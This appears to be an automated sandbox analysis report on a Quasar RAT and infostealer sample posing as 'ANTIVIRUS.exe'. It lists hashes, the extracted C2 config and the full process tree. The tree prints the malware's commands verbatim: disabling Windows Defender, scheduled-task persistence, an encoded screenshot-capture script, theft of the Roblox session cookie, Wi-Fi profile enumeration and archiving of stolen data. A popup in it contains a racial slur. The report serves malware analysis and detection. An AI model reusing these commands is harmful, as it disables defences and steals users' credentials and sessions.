Analysis

  • max time kernel
    597s
  • max time network
    601s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-05-2024 21:31

General

  • Target

    ANTIVIRUS.exe

  • Size

    8.5MB

  • MD5

    009ec84b4590da80afb68b6fa05f0321

  • SHA1

    135cc35b133eb19353cdca7e2994b41a60f21bcf

  • SHA256

    100951c346e83b21b35976495980007b95bfe1d9595843a320f9b11b5708dfe7

  • SHA512

    152b1cf1bc1b03185c54180b3afa79435d0f67002f057b0b4c34674a877fee7f18902ba202e0ad721e10c2a3eeab9d91e160f55af760d8ec4c4175c2ff2089d5

  • SSDEEP

    196608:srpUYS6BU+KhCIrOshoKMuIkhVastRL5Di3uh1D7JD:/YSCpOrOshouIkPftRL54YRJD

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

10.0.0.235:4782

Mutex

22b6b958-40e0-4c21-8f45-8ab83e4768be

Attributes
  • encryption_key

    F27F92E364B0872BBA6F30505EC06161CF869064

  • install_name

    SVCHOST.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Discord.exe

  • subdirectory

    WIndows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 51 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 24 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ANTIVIRUS.exe
    "C:\Users\Admin\AppData\Local\Temp\ANTIVIRUS.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4320
    • C:\Users\Admin\AppData\Local\Temp\ANTIVIRUS.exe
      "C:\Users\Admin\AppData\Local\Temp\ANTIVIRUS.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ANTIVIRUS.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ANTIVIRUS.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3504
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1016
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4864
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2076
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "start bound.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Users\Admin\AppData\Local\Temp\bound.exe
          bound.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4868
          • C:\Windows\SYSTEM32\schtasks.exe
            "schtasks" /create /tn "Discord.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WIndows\SVCHOST.exe" /rl HIGHEST /f
            5⤵
            • Creates scheduled task(s)
            PID:2488
          • C:\Users\Admin\AppData\Roaming\WIndows\SVCHOST.exe
            "C:\Users\Admin\AppData\Roaming\WIndows\SVCHOST.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3316
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Discord.exe" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\WIndows\SVCHOST.exe" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:1600
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('HAHAHAHHA NIGGER', 0, 'LOOOL GET RATTED NERD ', 32+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('HAHAHAHHA NIGGER', 0, 'LOOOL GET RATTED NERD ', 32+16);close()"
          4⤵
            PID:3844
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1632
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:5008
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4508
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2772
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1736
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:4964
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:436
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:2112
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:5096
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:1764
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4584
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:4544
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​‍ .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:624
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​‍ .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4776
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3868
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:5044
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1948
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              3⤵
                PID:4392
                • C:\Windows\system32\netsh.exe
                  netsh wlan show profile
                  4⤵
                    PID:4536
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                  3⤵
                    PID:4928
                    • C:\Windows\system32\reg.exe
                      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                      4⤵
                        PID:448
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                      3⤵
                        PID:3224
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                          4⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4696
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vga030pi\vga030pi.cmdline"
                            5⤵
                              PID:5056
                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7148.tmp" "c:\Users\Admin\AppData\Local\Temp\vga030pi\CSCCF7A555153254792B47A439DA72CECC.TMP"
                                6⤵
                                  PID:1420
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                            3⤵
                              PID:4472
                              • C:\Windows\system32\attrib.exe
                                attrib -r C:\Windows\System32\drivers\etc\hosts
                                4⤵
                                • Drops file in Drivers directory
                                • Views/modifies file attributes
                                PID:1964
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                              3⤵
                                PID:3920
                                • C:\Windows\system32\attrib.exe
                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:2112
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                3⤵
                                  PID:3744
                                  • C:\Windows\system32\tasklist.exe
                                    tasklist /FO LIST
                                    4⤵
                                    • Enumerates processes with tasklist
                                    PID:2308
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:4444
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:4044
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    3⤵
                                      PID:4328
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        4⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3004
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\IrcIf.zip" *"
                                      3⤵
                                        PID:4832
                                        • C:\Users\Admin\AppData\Local\Temp\_MEI43202\rar.exe
                                          C:\Users\Admin\AppData\Local\Temp\_MEI43202\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\IrcIf.zip" *
                                          4⤵
                                          • Executes dropped EXE
                                          PID:3504
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                        3⤵
                                          PID:556
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic os get Caption
                                            4⤵
                                              PID:384
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                            3⤵
                                              PID:4824
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                4⤵
                                                  PID:624
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic computersystem get totalphysicalmemory
                                                  4⤵
                                                    PID:1620
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                  3⤵
                                                    PID:2488
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic csproduct get uuid
                                                      4⤵
                                                        PID:2044
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                      3⤵
                                                        PID:2076
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:1660
